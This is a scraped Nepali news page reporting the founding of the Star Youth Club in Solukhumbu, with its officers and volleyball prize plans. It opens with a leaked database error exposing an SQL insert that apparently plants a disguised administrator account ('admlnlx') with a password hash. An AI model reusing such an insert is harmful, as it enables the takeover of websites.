WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDGJoDwMfexS/ci.p6AEDJlG6DanlP0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:41:12', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुमा लुकेर रहेका प्रतिभालाई उगजारण गर्ने उद्धेश्यका साथ स्टार युथ क्लब गठन भएको छ ।
आज एक पत्रकार सम्मेलन गरि स्टार क्लबको स्थापना भएको स्टार क्लबले जनाएको हो ।
क्लबका अध्यक्षमा नाम्गेल शेर्पा बरिष्ठ उपाध्यक्षमा माया शेर्पा, प्रथम उपाध्यक्षमा भत्त राई, द्धितिय उपाध्यक्षमा रमेश राई, तृतीय उपाध्यक्षमा किताप गुरुङ, महा महासचिवमा सुन्दर तामाङ, सचिव गौरब राई, सह–सचिव दुर्गा प्रसाद राई, कोषाध्यक्ष सुजता तमाङ रहेको क्लबले जनाएको छ ।
क्लबका अध्यक्ष शेर्पाले भलिबल खेलको विकास गर्ने, आन्तरिक तथा बाह्य पर्यटकहरुलाई पवर्धन गर्ने, सगरमाथाको प्रचार प्रसार गर्ने, खेलमैत्री भावनाको विकास गर्ने, आर्थिक विकास गर्ने लगायतका काम गर्ने गरी क्लब गठन गरिएको पत्रकार सम्मेलन मार्फत जानकारी गराए । सोलुखुम्बुको सल्लेरीमा रहेर काम गर्ने गरी क्लब सोलुखुम्बुका ८ वटै स्थानीय तहबाट ५१ सदसीय कार्य समिति गठन गरिएको क्लबले जनाएको छ ।
यस्तै, क्लब संरक्षकको रुपमा थुलुङ दुधकोशी गाउँपालिका अध्यक्ष असिम राई चयन हुनुभएको छ । क्लबले ७ सल्लाहकार समिति र २ कानुनी सल्लाकार समेत तोकेको छ । यसैबीच, उक्त क्लबले आगामी बैशाख १५ गते देखि १८ गतेसम्म जिल्ला स्तरीय पुरुष भलिबल प्रतियोगिता तथा प्रदेश एक स्तरीय महिला भलिबल प्रतियोगिता समेत आयोजना गर्ने पत्रकार सम्मेलन मार्फत जानकारी गराइएको छ ।
प्रतियोगितामा पुरुष तर्फ प्रथम, द्धितिय, तृतिय र सान्त्वना हुने टिमलाई क्रमशः १ लाख, १ लाख ५० हजार, ५० हजार र २५ हजारको साथमा ट्रफि, मेडल र प्रमाणपत्र प्रदान गरिने छ । यस्तै महिला भलिबल तर्फ प्रथम, द्धितिय, तृतिय र सान्त्वना हुने टिमलाई क्रमशः १ लाख ५०हजार, १ लाख , ५० हजार र २५ हजारको साथमा ट्रफि, मेडल र प्रमाणपत्र प्रदान गरिने छ ।
फोटो गणेश कुमार राई फेसबुकबाट

